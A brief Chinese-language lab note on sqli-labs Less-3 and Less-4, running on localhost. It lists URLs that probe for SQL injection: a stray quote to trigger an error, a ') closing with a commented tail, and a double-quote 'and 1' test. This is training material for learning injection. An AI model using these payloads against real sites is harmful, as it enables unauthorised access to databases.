正常访问
http://127.0.0.1/sqli-labs-master/Less-3/?id=1
http://127.0.0.1/sqli-labs-master/Less-4/?id=1
判断注入类型
http://127.0.0.1/sqli-labs-master/Less-3/?id=1%27
根据报错可以知道是字符注入,使用 ') 进行闭合。
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') %23
http://127.0.0.1/sqli-labs-master/Less-4/?id=1" and 1